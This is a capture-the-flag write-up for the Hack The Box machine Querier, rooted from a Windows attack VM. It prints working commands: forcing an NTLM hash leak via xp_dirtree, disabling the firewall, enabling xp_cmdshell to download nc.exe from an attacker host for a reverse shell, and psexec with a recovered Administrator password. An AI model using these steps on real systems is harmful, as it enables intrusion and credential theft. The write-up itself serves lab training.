Hey guys this is the second post for Querier, you can read the first post here. In the first post I solved it with kali, In this post I will solve it with commando vm. Querier’s ip is
10.10.10.125 I added it to
querier.htb. Let’s jump right in !
As always we will start with
nmap to scan for open ports and services :
nmap -sV -sT -sC querier.htb
mssql server on port 1433. We don’t have credentials for
mssql so let’s check
We need to list the shares, We can do that using
net view :
net view querier.htb
It only showed us
Reports because it’s the only share that we can access anonymously which is nice.
We can mount the share from
net use :
net use Z: \\querier.htb\Reports /persistent:yes
We can also do it from the file explorer :
olevba to get credentials from the excel file like I did in the first post :
To connect to the
mssql server I will use HeidiSQL :
However, authentication failed :
I tried windows authentication :
But it also failed because it was trying as guest not reporting :
To solve this we can use
runas to run
heidi as reporting :
runas /netonly /user:QUERIER\reporting cmd.exe
From the new
cmd session I ran
Now windows authentication worked :
Got permission denied for
We can run a fake
smb server to capture credentials using a tool called
Inveigh which works like responder. From
powershell I imported
Import-Module C:\Tools\Inveigh\Inveigh.ps1). Then I disabled the firewall (
netsh advfirewall set allprofiles state off) and invoked
Invoke-Inveigh -IP 10.10.xx.xx -ConsoleOutput Y).
Heidi I used
EXEC MASTER.sys.xp_dirtree '\\10.10.xx.xx\fakeshare'
Inveigh captured the
NTLMv2 hash for
After cracking the hash on another box the password is
corporate568. Now we can use
runas to run
runas /netonly /user:QUERIER\mssql-svc "C:\Program Files\HeidiSQL\heidisql.exe"
Queries to enable
EXEC sp_configure 'show advanced options', 1;
Great, we got
RCE. I ran a python server to host
nc.exe then I downloaded it on the box and got a reverse shell :
EXEC xp_cmdshell 'powershell Invoke-WebRequest -o C:\Users\mssql-svc\Desktop\nc.exe http://10.10.xx.xx/nc.exe';
We owned user.
As I said in the first post, when I checked group policy passwords I found Administrator’s password. There are privilege escalation enumeration scripts for Windows like
LinEnum.sh for Linux one of them is
powerup.ps1 and it checks for group policy passwords. Let’s check that one :
It also decrypts the password which is nice. Password :
Now we can use
psexec to get a shell as Administrator. I used
runas to start
QUERIER\Administrator then I used
runas /netonly /user:QUERIER\Administrator cmd.exe
psexec \\querier.htb cmd
And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.